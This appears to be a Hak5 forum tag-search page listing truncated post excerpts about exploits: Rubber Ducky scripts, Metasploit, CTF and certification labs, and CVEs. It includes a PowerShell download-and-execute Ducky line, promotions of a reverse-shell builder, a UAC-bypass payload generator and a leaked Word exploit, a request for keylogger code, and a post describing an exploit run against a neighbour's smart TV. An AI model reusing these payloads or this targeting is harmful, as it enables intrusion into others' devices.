Jump to content

Search the Community

Showing results for tags 'exploit'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Is it possible to make a rubber ducky open a new cmd window with admin privileges? (without the privileges yourself) (Please put the code in the comments if you can)
  2. Hi guys, I am new to this forum and after looking around nearly everywhere, I am unable to find an answer to this question and hoped you could help. After scanning a website with nkito, the result showed that it was vulnerable to the sips vulnerability and that I could login as admin without knowing the password. However, after inputting the information in the url, I was simply redirected to the login page which also contains a captcha. Is there anyway I can still exploit the vulnerability such as using Metasploit?? Please help
  3. Hi dear friends. I watched to this video. But I dont know, which payload he was use in this video. So, what do you think about it? Which payload must be it?
  4. I'm looking for a good list of easy to explore CVE's to begin learning about exploit creation.
  5. “Hackers are using booby-trapped Word documents to deliver malware to unsuspecting victims. The malware exploits Windows Object Linking and Embedding (OLE) features, which allow users to link to documents and other objects – in this case, a malicious remote server.”Source: https://www.vadesecure.com/en/word-doc-malware/This tool was created by the AutoLog team and has been since leaked. Here is the latest version of their OLE Doc Exploit.VirusTotal: https://www.virustotal.com/#/file/1b59c575fc8f3357982a4d917300725065946e31e3dd39f8b00c084aae8f3314/detection Download: https://www.0dayexploi
  6. asmTshell is a exploit pen test application I developed for users using linux such as debian ubuntu or kali OS. This tool allows you to build a reverse shell binary file and can be set to run on any OS be it windows linux or mac. Once the target windows/linux/mac system runs the shell binary they connect to your server giving you full control of the systems command prompt or shell from your server. It works by utilizing a linux asm compiler called "nasm" It takes target asm payload and allows you to customize the payload to your des
  7. Hi there, Can I use teensy 2++ to use BadUSB exploit like a rubber ducky ?
  8. Hope someone can help me....... I used CVE-2017-0785 to exploit my neighbours SmartTV...... It gave me this out ---> sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76 [!] Pwntools does not support 32-bit Python. Use a 64-bit release. [+] Exploit: Done 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 │····│····│····│····│ 00000030 b5 69 01 00 b4 8f e9 c0 00 00 00 00 b5 54 fe a3 │·i··│····│····│·T··│ 00000040 00 00 00 06 b5 69 39 70 b4 8f e9 e0 b5 60 61 38 │····│·i9p
  9. Hey all ! Greetings.! This is my 1st thread I have just a quick question regarding CTFs or Linux Systems. Anyone up for clarifying my doubt? So almost any CTF machine without GRUB or Kernel restriction can be easily tweaked to gain root access.! If so, i think this can be a legit way to enter the system and perform rest of the activities.It saves time and doesn't require privilege escalation exploits. If not, please do tell me why this can't be a legit way?
  10. Hello! This is my first post and contribute to this community, one of hopefully many. I am yet to receive my rubber ducky, so while waiting i thought i give writing some scripts a go. I consider the rubber ducky to be the mother of physical access exploits, being able to deploy anything in a very short period of time. DELAY 750 GUI r DELAY 1000 STRING powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://myhost.com/script.txt', '%temp%/run.vbs') ;Start-Process '%temp%/run.vbs'}" DELAY 500 ENTER Above is a basic rubber ducky script that downloads
  11. I have found an exploit that turns off a phone. I am wondering how i can develop this into something?
  12. Hi all i'm currently undertaking a project that involves exploiting a metapsloitable 2 machine and a windows XP machine running SP3, however the findings that i have found are that there are limited resources available when using metapsloit as there seems to be many step by step guides of how to complete an exploit but not enough information regarding troubleshooting. Do you think it would be beneficial to learning to explain more about each step of an exploit in terms of what each command does and if an exploit fails for there to be more information available about why it fails and worka
  13. Hi all, I'm trying to learn the basics of using public exploit code and am running into a "floating point exception" error when I run the complied code on the target machine. I'm not sure if I am doing something wrong, or if I just need to move on and try another exploit. Your help is greatly appreciated. I am using a 64 bit Kali VM to attack a 32 bit redhat SHRIKE VM. I found an exploit in exploitdb that looks like it should work, "12.c", and have compiled it. The original source code had some simple errors with bad comments and a header file that was in a different location. S
  14. This is my official release of my UAC bypassing Rubber Ducky payload generator "UAC-DUCK". Download and execute any binary executable on any windows machine with UAC enabled as administrator WITHOUT prompting the user to elevate privileges . Its a 3 second download and execute with admin access. Generator written in Python so it's cross compatible with Windows and Linux. Github: https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky Full demo: http://sendvid.com/uh6i317i It uses a simple 2 stage process Stage 1: Stage one is the script that is triggered w
  15. I've been seeking online for a complete tutorial that goes from finding if a computer is vulnerable to an exploit to getting a meterpreter session without the use of trojans. The things that are missing are... 1.the exact procedure of scanning a pc to find if it is vulnerable (and if it is possible a pc outside a local network and how is it possible to scan individual compuiters that are behind routers?) 2. Importing a new exploit that isnt already inside the metasploit framework. 3. setting a backdoor without the use of the persistance command of the meterpreter. 4. the procedure of the
  16. Hi guys, after the discovery of the Stagefright bug, the researcher of Zimperium have post a python script for the specific module CVE 1538. I've download it and i've try to execute this on my Android phone with Lollipop 5.0. Before this, i've downloaded the apk of zimperium to test if my phone is vulnerable. The app show me, in green, the module CVE-1538 e other... After this, on my linux pc with python 2.7.x, i've renamed the script in mp4.py for resolve an error of import. After this i've tried to generate the file.mp4 with this command: $python2 mp4.py -c [LAN IP] -p 4444 The s
  17. hello everyone, i was wonder about support regard security issues/exploits. so like most of you guys i also carry a "smartphone" (android in this case). what do you guys think the support on a "smartphone" should be? 2 years, 3 year, 5 years? and should it receive security updates even a year after the mentioned years? also i own a HTC One M7 (android) should in this case HTC (and or any other brand) make a security update for a phone regarding the fact that it is 3 years old because of the stagefright exploit? Thank in advance and sorry if the reading is wonky
  18. Is there any way for me to inject a payload into the duck that records keystrokes automatically, or at least run a software that i made, a keylogger, automatically upon insertion? If there is can you give the codes? Thank you.
  19. Hi Guys, I figured I'd give this site try, you guys seem very knowledgeable. I'm on two straights weeks of researching exploits for my Red hat 2.4.20-8 version and hoping the end result being escalated local privileges from a standard user. Everything keeps pointing back to the following code for that older OS. https://www.exploit-db.com/exploits/22362/ And the Mremap.c code, Ive seen remap.c and also mremap .c Unfortunately im not a programmer, yet I've learned about the gcc compiler , versions of gcc and so on in the recent weeks through my trials. My studies end here, it boils down
  20. Howdy Hak5 folks.. Well, I'm expected some "try harders" and other such encouragement :)..I'm at the very tail end of the CPT exam. If anyone is unsure of it, first part is multi-choice (aced it!) ..second is compromising two VM's..got first in minutes happy to say..the second one......here is where I'm losing my hair very quickly. The objective is root password on both vm;s...this second one is where I seem to be hitting a dead end, and this is the first reaching out for help attempt. Basically, from what I can gather, this particular vm needs to be compromised via a local exploit be it pri
  21. I created a tutorial on how to get a remote shell on any windows PC in 5 seconds using RubberDucky... enjoy! https://crowdshield.com/blog/2015/pwn-any-windows-pc-in-5-seconds-with-badusb.php
  22. As a pentester, I find myself checking random fields and forms for arbitrary code execution and came across a code execution flaw in the log viewer infusion for the Pineapple. This isn't technically a vulnerability since you need to be logged in as root but it's still un-intended functionality resulting in arbitrary code execution.... Regardless of the impact, I enjoy finding things like this so here it is... enjoy! https://www.youtube.com/watch?v=I_i2RhfB-Z8
  23. The website cloner is not working for external viewers to my IP, it works from the host computer but no other one, I am quite new to this and would like a detailed responce on how I make it work for external clients visiting the IP. ~Thankyou
  24. Hi all, I was reading through xkcd and came across this comic. It seemed like a good idea, and I was wondering if something like that might be possible, and if so, how. I would need specifics, like how to set up connections. Thanks!
  25. Hello, here is the video: How to exploit Heartbleed Vulnerability on Kali Linux arabic version of the video: شرح فحص و استغلال ثغرة heartbleed علي مواقع كبيرة و مشهورة share and enjoy :)
×
×
  • Create New...